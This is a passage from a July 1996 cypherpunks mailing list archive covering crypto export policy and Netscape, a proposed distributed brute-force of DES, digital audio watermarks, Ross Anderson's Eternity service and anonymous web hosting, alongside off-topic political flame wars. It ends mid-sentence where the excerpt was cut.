On Mon, 22 Jul 1996, Perry E. Metzger wrote:
> (BTW, Jefferson's slaves were inherited and an an entailment clause in
> the will prevented him from freeing them during his lifetime. Not, of

It would be hard to prove the case that this was the only thing 
preventing earlier manumission, but then the whole issue is one of the 
hardest things to understand about Jefferson; many of his closest friends 
were leaders in the abolitionist movement of the time, and it's almost 
impossible to believe that he didn't know slavery to be morally 
indefensible relatively early on in his political development. Guess it 
was just part of his programming he couldn't throw off.

Still leaves him just ahead of FDR as best american president, but does
drop him a way behind Paine for best  political theorist of the revolution

 ---
Cause maybe  (maybe)		      | In my mind I'm going to Carolina
you're gonna be the one that saves me | - back in Chapel Hill May 16th.
And after all			      | Email address remains unchanged
You're my firewall -    	      | ........First in Usenet.........




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Tue, 23 Jul 1996 11:55:15 +0800
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: Netscape
In-Reply-To: <199607220009.RAA08680@dns2.noc.best.net>
Message-ID: <Pine.LNX.3.94.960722181204.950B-100000@switch.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 21 Jul 1996, James A. Donald wrote:

> Date: Sun, 21 Jul 1996 08:23:22 -0700
> From: "James A. Donald" <jamesd@echeque.com>
> To: Tom Weinstein <tomw@netscape.com>, cypherpunks@toad.com
> Subject: Re: Netscape
> 
> At 03:27 PM 7/20/96 -0700, Tom Weinstein wrote:
> > Why not consider what the consequences will be?  Do you seriously
> > believe that this will make the government stop enforcing ITAR? 
> 
> Yes:  
> 
> Widespread politically motivated disobedience forces
> the state to either demonize the disobedient, (as with drug users)
> or give up enforcement.  This is a standard and effective method
> of forcing the repeal of laws, a method which has had a long record
> of success for several hundred years.
> 
> The states cohesion derives from its legitimacy, and threats to
> legitimacy and cohesion are treated very seriously by government
> officials.
> 
> Threatening the states legitimacy is arguably more effective in 
> influencing government behavior than blowing up federal office
> buildings.

Hrmm... I'm definatly on your side.  _Civil_ Disobediance has been, and
always will be, the most effective way.

 --Deviant


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMfPEwDAJap8fyDMVAQGA1Af7Bymmynm/ocJ+vFr4MQbIOVwfhLrxZw9K
3bG2WzmbdopMXSJ8rXW09ETMOYZOCoM73Kbv16M3MrhytgDIguFxxwqibQfSWzOy
ZOWS8DJS4SL47Y8pE5jK1WAasK7QmWJXS4TsUX1ablIcNNK+LXMqxaWXN/0cLIKE
IhZJ4jV+Sq4+G+4zACOqi0kiIPu+A3YYXlNHR0l6RTmSDFY97qzyGJwOCOPgApGe
YekQz4uLuXDZ6JIq2k1Sgt6M71dQne8u/oBnV9qa1ONNx+q00yP0P4nLLhgKEfvZ
gi3RSoRsFie7xBFrZdUGFP5XwQLtmd1gZc4rfEZ8GSxRxxO0Kq3iAw==
=DfR4
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@chromatic.com>
Date: Tue, 23 Jul 1996 12:19:38 +0800
To: cypherpunks@toad.com
Subject: No more stupid gun thread ...
Message-ID: <199607230124.SAA01022@server1.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain


Ok.  This thread has gone on long enough and covered just about every
point except the one which I originally made in my first response,
which is that I abhor the idea that kids should carry weapons (of any
sort) to school as standard equipment.  In fact, I abhor the idea
that kids should carry weapons at school for any reason.

Enough said.

I do not care to discuss:

1.  Should kids have any weapons at any time?

2.  Should kids have guns (specifically guns)?

3.  Should kids know how to operate weapons of any sort?

If any of you really really have to discuss this issue, let's spare
the rest of the list and send me E-Mail directly.

Thanks!

Ern




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Tue, 23 Jul 1996 12:16:08 +0800
To: hallam@Etna.ai.mit.edu
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <9607221613.AA00685@Etna.ai.mit.edu>
Message-ID: <Pine.SV4.3.91.960722182646.11943C-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


> Nope, that wasn't me who said that. I don't normally quote the words of 
> slave owners on the subject of liberty.


   How do you feel about womanslaughterers and drunkards?  I can send you 
a list of your senior US Senator's  quotations.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 23 Jul 1996 20:14:33 +0800
To: Ernest Hua <hua@xenon.chromatic.com>
Subject: Re: Giving 6 year old kids Uzi's (Was: Responding to Pre-dawn 	 Unannounced NinjaRaids)
Message-ID: <v02120d1aae19d9f11c85@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:01 7/22/96, Ernest Hua wrote:

>You might be missing the mark too, but I thought the subject was
>giving a gun to every child who enters school, not YOURs or SOME
>EXPERT 6 YEAR OLD's special case.

There is *nothing* that should be given to every child or every adult for
that matter. I very much oppose the use of my tax dollars to issue guns or
school books to children. Let the parents buy the items required for the
children's safety or education.

[We are straying away from crypto...]



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@Etna.ai.mit.edu
Date: Tue, 23 Jul 1996 09:35:04 +0800
To: "Mark M." <cypherpunks@toad.com
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <Pine.LNX.3.94.960722175337.127B-100000@gak>
Message-ID: <9607222254.AA01221@Etna.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



>> Notwithstanding entailment clauses, Jefferson was under no compunction to
>> exploit his slaves by exploiting their labour. He could have paid them 
>> competative wages and allowed them to chose to work for others. In short
>> he could in effect have freed them. Of course then he would not have had 
>> the financial means to live as a member of the privileged classes. 
>> 
>> Genuine philosophers have made such sacrifices. Russell gave away his 
>> inheritance after completing Principia because he objected to the idea
>> of inherited wealth. 

>This is an entirely subjective and philosophical argument about whether the
>means justify the ends.  I won't debate any of the issues here.  However,
>consider the fact that if Jefferson didn't have as much money as he had, he
>might have not had as much policial impact.

No, the argument is over whether a person should live by the ideals he
preaches. I have more respect fot the likes of Kant and Russell who made
rather more of an effort than Jefferson.

The observation that history is made by rich people and written by rich 
people is not a new one. Until this century there were few countries
where politics were open to anyone but the very wealthy. In the USA
that is still by and large the case.

Rather than attempting to excuse Jefferson it would be better to
accept that not everything he said was valid when he said it and
to try to engage ones brain rather than using his words as slogans.


>Also think about the fact that all libertarians who drive cars, are by your
>definition, hypocrites because they drive on tax-funded roads.

Since they are denied the "right" to live in Libertopia they have
no choice but to live in the real world. That doesn't make them
hypocrites. They are not directly contradicting their principles.

On the other hand there are plenty of "free-market" economists
who live entirely on grant money from the public purse and plenty
of those "libertarians" will be accepting government assisted
funding through college or would do so if it was available.


>Sometimes it is necessary to violate one's principles in order to help the
>greater good.

Yes, but how can a Randite libertarian do so in good faith? For such
people there is no greater good, it is all the self.


		Phill





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 23 Jul 1996 11:16:52 +0800
To: cypherpunks@toad.com
Subject: Re: Digital Watermarks for copy protection in recent Billboard
Message-ID: <ae190c57090210045956@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:19 AM 7/22/96, Alex F wrote:

>This is probably yet another case of people not thinking ahead.  As
>usual.  People buying CDs at a garage sale & getting arrested for
>piracy.  Wonderful.

Arrests like this are uncommon. Even buying "cheap bikes" and other "cheap"
(= probably stolen and fenced) merchandise almost never subjects the
purchaser to criminal sanctions. I think the legal types would call it
"scienter" (direct knowledge of the act), with a dollop of "provenance"
(the paper trail) thrown in.

For example, finding a piece of paper with my name on it by the side of the
road does not prove I littered, as the paper could've gotten there by
blowing off a trash truck, by being thrown there with others who found it
(perhaps at the trash site), and so on. Scienter, provenance, etc.
("Alice's Restaurant" not to the contrary; the confession to Officer Obie
cinched his fate.)

So, purchasers from garage sales need have no fear that the Copyright
Police will arrest them. If anything, the garage sale folks might get a
visit, assuming they were dealing in large enough volumes to indicate they
were links in a chain of pirates. This is in fact what most of the "piracy"
cases have involved.

>Actually, this would be quite easy.  The "watermark" would be a
>signal that plays inband, but out of our hearing range during the
>entire CD.  The human ear can only hear in the 20-20,000 (Hz, KHZ?,
>whatever) range.  It would be trivial to add a digital ID signal at,
>say 30,000 or 15 or something like that.  This could then be decoded,

Doubtful. The existing CD standard tops out at a Nyquist limit of about
20KHz, with the actual sampling at 44 KHz--but there is simply "nothing" at
above 20-22KHz. Putting a signal in at "30 KHz" is simply not possible,
given the Nyquist Theorem and the CD sampling rate.

Placing a nominally "inaudible" signal in at, say, 15 KHz, was in fact the
first proposal for the DAT market, circa 1986-88. The signal was in fact
detectable by many, and was dropped in favor of SCMS (pronounced "Scums,"
but standing for Serial Copy Management System). SCMS does not involve
actual changes to the audio stream. It is easily defeated--I have access to
one for making DAT-to-DAT transfers.

The larger issue of watermarks in digital data is an interesting one. Some
of the proposals people talk about have actually been spoofs (esp. the Bart
Nagel "announcement" in "Mondo 2000" a couple of years ago, which still
gets cited as an actual technique, about the same way the "Infoworld" spoof
about how the NSA got viruses planted in equipment bound for Iraq got
picked up by some as an example of "infowar.")

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Tue, 23 Jul 1996 09:43:24 +0800
To: hallam@Etna.ai.mit.edu
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <9607221842.AA00771@Etna.ai.mit.edu>
Message-ID: <Pine.SV4.3.91.960722184508.11943H-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


> Actually I have been very active in circles like Liberty (the UK version
> of the ACLU). Its just that we have entirely different ideas of what liberty 
> is. Perry believes that libery is license and I believe in the utilitarian
> formulation of Liberty as advanced by Mill, Russell et al.

    Well, you're in a country of _free citizens_ now, Limey, so if you
don't like it, then go back to England - a whole nation of people who foam at
the mouth with pride and pleasure over their status as feudal _subjects_.

Dja ever notice that Charlie Mountbatten married a gorgeous young babe,
but was irretrievably drawn to to an elderly woman of great ugliness? 

No, Phil, do NOT ask me to call him Prince.   I'd sooner follow the 
example of Lady Liberty in the Seal of the Commonwealth of Virginia.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Tue, 23 Jul 1996 14:44:34 +0800
To: Tom Weinstein <tomw@netscape.com>
Subject: Re: Netscape
In-Reply-To: <31F2DBAE.41C6@netscape.com>
Message-ID: <Pine.LNX.3.94.960722185601.950C-100000@switch.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 21 Jul 1996, Tom Weinstein wrote:

> Date: Sun, 21 Jul 1996 18:38:54 -0700
> From: Tom Weinstein <tomw@netscape.com>
> To: "James A. Donald" <jamesd@echeque.com>
> Cc: cypherpunks@toad.com
> Subject: Re: Netscape
> 
> James A. Donald wrote:
> > 
> > At 03:27 PM 7/20/96 -0700, Tom Weinstein wrote:
> > > Why not consider what the consequences will be?  Do you seriously
> > > believe that this will make the government stop enforcing ITAR?
> > 
> > Yes:
> > 
> > Widespread politically motivated disobedience forces
> > the state to either demonize the disobedient, (as with drug users)
> > or give up enforcement.  This is a standard and effective method
> > of forcing the repeal of laws, a method which has had a long record
> > of success for several hundred years.
> 
> A handful of cyperpunks hardly constitutes "widespread polititcally
> motivated disobedience".  In any case, the demonization has already
> begun; they point their fingers at the four horsemen of the internet
> at every oportunity.
> 

One might say the same thing about 10 or 20 people throwing shipments of
tea off of boats in boston harbor.

> 
> What I object to is anonymous activists who perform acts at no risk to
> themselves which make it harder for those of us who are trying to bring
> strong crypto to everyone.
> 

Why?  Because they can do it without risk?  The way I see it, if you can
do something that should be done, and you can do it at no risk to
yourself, then its all the better.

> > The states cohesion derives from its legitimacy, and threats to
> > legitimacy and cohesion are treated very seriously by government
> > officials.
> > 
> > Threatening the states legitimacy is arguably more effective in
> > influencing government behavior than blowing up federal office
> > buildings.
> 
> The first step is to create at least a strong minority.  A handful of
> cypherpunks can be largely ignored.  We have to get the general
> public using and educated about strong crypto before civil disobedience
> will mean anything.

Hrmm... I'll agree with that... We need to do something to get ourselves
noticed (and no, I don't mean blowing up the NSA headquarters)

 --Deviant


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMfPPxTAJap8fyDMVAQF6Lwf9Fo3+79zO31nd+CQpLYh0Ptqa0s/T9Fkg
T/sxZhB9qDK0E6qsvNq6MOn10YhBnHtJ2i7R5qyzgBlWLCsmcxT2SoYniRHV590s
6EXlvTyFMyCD1B5uFEdJrgOq9NTq18EEJ2+KxawPJ2OZKrN3XckCIfpZbl5m4GpW
NoLaWtcKOKjGtdJj+em/xbRnczOEJh7BQ733sXQVsOryjjFdXu8EV4oZN8FU0Qat
GNtw6VpzW2dLt2bcLEDXQSQdkIwXfs6+sXzjcGkB9SJoyAQMq20l1+h5YIHcfPiN
alqHzN6YGOy4tILt1O/Xght67DLgRWhUmW3Apo5C2+IOfzqzHdAUMQ==
=RATL
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Tue, 23 Jul 1996 14:08:09 +0800
To: cypherpunks@toad.com
Subject: alpha.c2.org down again?
Message-ID: <199607230205.TAA01421@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


I am receiving empty messages for my alpha.c2.org account.

Again.

Whats up?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@Etna.ai.mit.edu
Date: Tue, 23 Jul 1996 09:46:16 +0800
To: alanh@infi.net>
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <Pine.SV4.3.91.960722182646.11943C-100000@larry.infi.net>
Message-ID: <9607222307.AA01242@Etna.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



>   How do you feel about womanslaughterers and drunkards?  I can send you 
>a list of your senior US Senator's  quotations.

I don't normally quote Ted Kennedy on anything. You can add 
"appologist for terrorism" to that list if you like. On the 
other hand did you see the alternative that was offered????

US politics frequently gives one a choice between two people who 
individually would be unacceptable but together are acceptable
only because the other is even worse.

When Weld beat Silbur a large number of Mass Liberals voted
for the republican Weld as the more left wing of the pair. The
Presidential race is hardly enthralling with a choice between
a Democrat so right wing hes prepared to sign a Republican 
welfare bill and a septugenarian Republican who can barely 
string together enough words to make a sentence.

Oh and to complete the picture, we have a collection of assorted 
fruitcakes which make Dan Quaylee look apealing.



		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 23 Jul 1996 09:51:09 +0800
To: Ben Holiday <ncognito@gate.net>
Subject: Re: Distributed DES crack
In-Reply-To: <Pine.A32.3.93.960722174148.48340B-100000@navajo.gate.net>
Message-ID: <199607222314.TAA12858@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Ben Holiday writes:
> I've a few machines around that could be dedicated almost full time to the
> task. What are the bandwidth requirements?

Probably near zero. People can get sections of the search space
parceled out to them.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Tue, 23 Jul 1996 20:22:34 +0800
To: Ernest Hua <hua@chromatic.com>
Subject: Re: Filtering out Queers is OK
Message-ID: <199607230213.TAA01220@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  5:03 PM 7/22/96 -0700, Ernest Hua wrote:
>Therefore, nobody (not you, not the PTA, not the school, not the
>Congress) has any right to tell me what is good for my child.

Ern - This is a serious question.  When does your child have the right to
say that what you think is good for her/him is crap and then proceed to
ignore you?  IMHO, this question is the major question for the parental
rights at all costs people.

It is best if your children and you can reach broad enough mutual respect
so you can work this issue out informally.  However, I personally know a
lot of cases where the best didn't happen.  The teen-parent wars were quite
spectacular.


-------------------------------------------------------------------------
Bill Frantz       | Cave ab homine unius lebri | Periwinkle -- Consulting
(408)356-8506     |  [Beware the man of one    | 16345 Englewood Ave.
frantz@netcom.com |   book]  - Anonymous Latin | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Tue, 23 Jul 1996 19:46:38 +0800
To: cypherpunks@toad.com
Subject: Re: Borders *are* transparent
Message-ID: <199607230220.TAA01766@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:32 AM 7/22/96 -0006, Peter Trei wrote:
>Any one up for a distributed brute force attack on single DES? My 
>back-of-the-envelope calculations and guesstimates put this on the
>hairy edge of doability (the critical factor is how many machines can
>be recruited - a non-trivial cash prize would help). 

My Mac 9500/132 is chomping at the bit.


-------------------------------------------------------------------------
Bill Frantz       | Cave ab homine unius lebri | Periwinkle -- Consulting
(408)356-8506     |  [Beware the man of one    | 16345 Englewood Ave.
frantz@netcom.com |   book]  - Anonymous Latin | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 23 Jul 1996 16:58:50 +0800
To: cypherpunks@toad.com
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids (fwd)
Message-ID: <199607230048.TAA00049@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Mon, 22 Jul 1996 15:10:04 -0400
> From: Hallam-Baker <hallam@ai.mit.edu>
> Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
> 
> The "laws" of social scienst are not the "laws of physics". The "laws
> of physics" aren't so constant either. Theoretical results should 
> inform the intellect not serve as a substitute for it.

The laws of social science are the consequence of the laws of physics. One
of the primary, if not the primary, assumption of Physics is that natural
laws are isotropic and homogeneous. If they are not then we are all in deep
deep trouble (Vinge not withstanding). The relationship between the laws of
social science and physics is analgous to the relationship between the base
pairs in DNA and the concept of a gene. There is a distinct difference in
the nature but the latter can not exist without the former.

> If you apply genetic programming techniques to the system the strategy
> that evolves is typically a cooperative one. The facts is that the
> theory applied in an evolutionary context disproves Perry.

One of the primary observations about genetic programming is that the max
you get is best considered local and 'good enough', not optimal. An argument
based on genetic programming must admit prima facia that there is the
potential for a better answer.

                                                  Jim Choate





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@Etna.ai.mit.edu
Date: Tue, 23 Jul 1996 16:32:17 +0800
To: Alan Horowitz <cypherpunks@toad.com
Subject: NOISE: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <Pine.SV4.3.91.960722184508.11943H-100000@larry.infi.net>
Message-ID: <9607222349.AA01276@Etna.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


 
>   Well, you're in a country of _free citizens_ now, Limey, so if you
>don't like it, then go back to England - a whole nation of people who foam at
>the mouth with pride and pleasure over their status as feudal _subjects_.

O.K. lets see if we brits were to offer you yankees the Windsors,
plus an assortment of flunkies, corgies and stuff are you so sure that
your people would reject it? After all someone sold you a bridge so
it's not that implausible.

Given the way your press goes nuts over big ears and his ex wife
(aka familly brood unit) it is clear that you would jump at the 
chance if the price was sufficiently high (i.e. is the Brits asked 
for enough money).

>Dja ever notice that Charlie Mountbatten married a gorgeous young babe,
>but was irretrievably drawn to to an elderly woman of great ugliness? 

>No, Phil, do NOT ask me to call him Prince.   I'd sooner follow the 
>example of Lady Liberty in the Seal of the Commonwealth of Virginia.

Actually Lord Mountbatten was not a prince of the UK, he was a prince
of the Greek royal family and his name was not Charles. The Prince
of Wales is Charles Windsor an he comes from a distinguished line of
Germans. 

If you wish to insult our royal familly please learn how to do it 
_right_. You could refer to Charlie's wish to be reincarnated as a
tampon used by Camilla Parker-Bowles or his famous debate with a
house plant.

Which brings us to the point, the choice between the babe who
happens to be neurotic or the woman with a face like a horse?
People in those circles start riding horses at the age of four 
and so they probably don't look too bad to them. Besides, the
favourite position of the house of Windsor is the bucking bronco.


		Phill







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Russ Allbery <eagle@cyclone.Stanford.EDU>
Date: Tue, 23 Jul 1996 13:57:42 +0800
To: cypherpunks@toad.com
Subject: [Noise] Re: the VTW---FBI Connection
In-Reply-To: <XPugRD3w165w@bwalk.dm.com>
Message-ID: <qumu3uz4qor.thoron@cyclone.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Dr. Dimitri Vulis KOTM <dlv@bwalk.dm.com> writes:
> Rich Graves <rich@c2.org> writes:

>> Damn, he's onto us. Special Agent Allbery, your cover is blown.

> So, Russ is a stool pigeon?  That figures...

I have it on quite good authority that I am an undercover plant for
Gharlane and all that I see and hear is being relayed to Higher Powers.
Unfortunately, my cover is so deep that I can have no conscious knowledge
of this, so I can neither confirm or deny the theory.

I do, however, have a very impressive black suit in my closet that I have
no memory of buying....

As for the VTW, I'm afraid you'll have to ask someone else.  I have a
strict rule against interfering with Illuminati operations.

-- 
Russ Allbery (rra@cs.stanford.edu)      <URL:http://www.eyrie.org/~eagle/>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Reid <root@edmweb.com>
Date: Tue, 23 Jul 1996 14:12:56 +0800
To: trei@process.com
Subject: Brute-forcing DES
Message-ID: <Pine.BSF.3.91.960722194822.187A-100000@bitbucket.edmweb.com>
MIME-Version: 1.0
Content-Type: text/plain


> Any one up for a distributed brute force attack on single DES? My 
> back-of-the-envelope calculations and guesstimates put this on the
> hairy edge of doability (the critical factor is how many machines can
> be recruited - a non-trivial cash prize would help). 

Count me in. I've got a couple of net-connected Pentiums that are mostly
idle. 

Did you consider the possibility of DES chips in your back-of-the-envelope
calculations? They are hundreds of times faster than PCs. I don't know
where to get them or how much they cost, though. I would expect they
wouldn't be too expensive. The cash might be better spent on DES chips
than on a prize.

Might be able to bring some money in by selling "I Helped Crack DES And 
All I Got Was This Lousy T-shirt" T-shirts.


=====================================================================
| Steve Reid - SysAdmin & Pres, EDM Web (http://www.edmweb.com/)    |
| Email: steve@edmweb.com   Home Page: http://www.edmweb.com/steve/ |
| PGP (2048/9F317269) Fingerprint: 11C89D1CD67287E68C09EC52443F8830 |
|          -- Disclaimer: JMHO, YMMV, TANSTAAFL, IANAL. --          |
===================================================================:)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ted Anderson <ota+@transarc.com>
Date: Tue, 23 Jul 1996 17:27:46 +0800
To: Tom Weinstein <tomw@netscape.com>
Subject: Re: Netscape
In-Reply-To: <v02120d04ae1763d7df01@[192.0.2.1]>
Message-ID: <Qlx1UXqSMV0_036E40@transarc.com>
MIME-Version: 1.0
Content-Type: text/plain


shamrock@netcom.com (Lucky Green) writes:
> At 15:27 7/20/96, Tom Weinstein wrote:
> >Why not consider what the consequences will be?  Do you seriously
> >believe that this will make the government stop enforcing ITAR?  Do you
> >believe it will make them change the law?  No.  What it will do is make
> >them remove our permission to distribute this stuff.
> 
> I doubt that. PGP has been distributed for years with less safeguards
> than Netscape. It is available on more free-world sites than Netscape
> US. This did not prompt the powers that be to force MIT to take down
> their site.
> ...

I must agree with Lucky.  I am quite sure that even if Netscape was not
begin distributed over the net, copies would still be uploaded to
international sites by folks practicing Civil disobedience.  Only they'd
have to wait to get the release from a store or some other source.

If you think the net distribution channel is in danger, consider these
suggestions.  The basic idea is to provide plausible denyability that
the net site was the source of the "leak".

Offer to send the latest version on floppy to US addresses of
the first 100 people who request them.  I only suggest 100 to keep your
costs down.  But any decent sized number would do.

I got my copy bundled with my ISP software.  So make sure your ISP and
other redistributers have their copies a few days before you make it
available on the net.  Then new ISP accounts will start getting copies
before the net copies become available.

This may not work as well for beta's, but I'm sure other approaches
along these lines would work too.  Of course, it make sense to make sure
the binaries used in each of these channels are indistinguishable.

Ted Anderson




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vinnie Moscaritolo <vinnie@webstuff.apple.com>
Date: Wed, 24 Jul 1996 06:05:06 +0800
To: cypherpunks@toad.com
Subject: re:SHI_fty
In-Reply-To: <199607230147.VAA25244@lists.gateway.com>
Message-ID: <v03007601ae1a016c7829@[17.203.21.77]>
MIME-Version: 1.0
Content-Type: text/plain


>jya@pipeline.com (John Young) writes:
>
>>    "Microsoft Sees A Major Shift For Computers." John Markoff
>>
>>       MS is preparing to release new software that would bring
>>       the most fundamental change to personal computers since
>>       the machines were invented in the 1970's.
>
Uh I think apple had that for a while, it's called cyberdog
http://cyberdog.apple.com screw this ole fud.



Vinnie Moscaritolo
Developer Tech Support
http://www.vmeng.com/vinnie/
Fingerprint: 4FA3298150E404F2782501876EA2146A






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 24 Jul 1996 06:14:46 +0800
To: cypherpunks@toad.com
Subject: Ross Anderson's Eternity service
Message-ID: <199607230313.UAA18607@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Sherry Mayo posted here a while back a reference to Ross Anderson's
Eternity service paper, <URL: http://www.cl.cam.ac.uk:80/users/rja14/#Lib >.
He is also giving an invited talk on the subject this fall at a crypto
conference in Prague.

The goal of the Eternity service is to make published information
permanently and ineradicably available, despite efforts on the part of
powerful attackers to destroy it.  The attack model explicitly
includes governments.  This has obvious relevance to current
controversies involving copyright, trade secrets, etc.

It's difficult to evaluate the proposal because many of the issues
seem more legal than technical.  Can a service like this, which
would seemingly exist largely to circumvent legal restrictions on
publishing, possibly be legal?

Anderson's basic concept is of a network of storage servers in widely
scattered jurisdictions.  He uses cryptography so that although the
servers store data, no single computer knows exactly what is stored in
the encrypted files it holds.  Keys to the data are spread across the
network using secret sharing techniques, with mutual cooperation among
the servers being necessary to decrypt files.  (I believe the files
themselves are redundantly stored on individual servers, but they are
encrypted with keys which are split.)  Anonymous communications are
used among the network of computers to reply to requests, so that
attackers can't tell which computer produced a requested document.

The overall goal is apparently to arrange things so that each
individual server has a level of deniability if they are accused of
having provided information which is illegal in some jurisdictions.
It can deny having produced any particular document in question, and
if everything is designed properly it is not possible to prove
otherwise (other than by subverting a bunch of the other servers).

I won't try to go into much detail here (actually I found some of the
crypto details kind of hard to follow in the paper, but I will write
up my understanding if there is interest) but some of the other ideas
are that the service would charge money enough to cover its costs and
add new equipment as storage requirements increase (to prevent
flooding attacks), and that requests would be submitted by broadcast
to the network of servers, and information returned via a remailer
network.  The documents would be identified by some global names, and
one of the documents would be an index file which identifies the
others, with descriptions.

A few questions for discussion:

 - Would it be possible in practice to run a network like this?

 - Would there be much interest in it among users?

 - Would it be a net benefit to society for such a service to exist?

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 24 Jul 1996 00:26:27 +0800
To: cypherpunks@toad.com
Subject: Anonymous web servers
Message-ID: <199607230317.UAA18923@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


[This is somewhat of a follow-up to Black Unicorn's idea about private
web pages a few weeks ago, also motivated by thinking about Ross
Anderson's Eternity service, about which I just posted.]

Right now you can get anonymous web pages at various places.  But
these are basically just regular web pages where you haven't told the
service provider what your name is.  If somebody doesn't like what you
have posted there they may be able to get your pages shut down just as
easily as if you were non-anonymous.

I was thinking about ways to allow more truly anonymous web pages.
The goal would be to allow them to operate even if someone powerful
didn't like them.  I'm not sure the idea I have really works but I
thought I'd lay out some possibilities.

The web is basically a client-server environment.  The server sits
there all the time ready to accept connections from users running
clients (browsers).  The client connects briefly to a web page and
downloads the data for the page.  It disconnects and displays the
data.  Some of the newer technologies have extended this model but
it is the original concept.

The idea I have is to provide a meeting place for anonymous servers
and clients.  There would be a sort of "meta-server" which runs
software which just pairs up interested parties.  The idea is that
both servers and clients would be relatively transient.

Two people would arrange in advance to interact via web protocols, and
agree on a transient URL which they would share.  The client and
server both connect to the "meeting place" host, specifying the magic
name they have agreed on.  The meeting place software would then pair
up connections which shared the same name and allow them to interact
via conventional protocols.  URL's for the meeting place server would
be interpreted in this context rather than simply as file names.

In some ways the role of the "meeting place" software is similar to an
IRC server.  In fact, this concept could be thought of as HTTP over
IRC.

The big question mark is whether the meeting place would be blamed for
the possibly illicit transactions it facilitates.  It can argue that
it didn't know what people are doing (it might require people to use
SSL for their transactions so it doesn't see them).  But in practice
it may be easy for attackers to prove that illegal transactions are
going on (they just arrange to connect to an illicit server and
download incriminating evidence).  It does seem though that IRC,
despite having a reputation as a place where a lot of illegal
transactions occur, manages to keep running, without the servers
taking the blame.  Maybe it is just a matter of having a low enough
profile?

You'd also have a problem if a server, protected by anonymity, decided
that being transient was stupid and arranged to always be ready to
respond to one of the anonymous URL's.  Then there seems effectively
no difference between the "meeting place" with an anonymous server
URL, and an ordinary host with an objectionable file available via
URL.  In each case clients connect and get the same illegal data.

One thing we haven't seen (AFAIK) is anonymous posters offering to
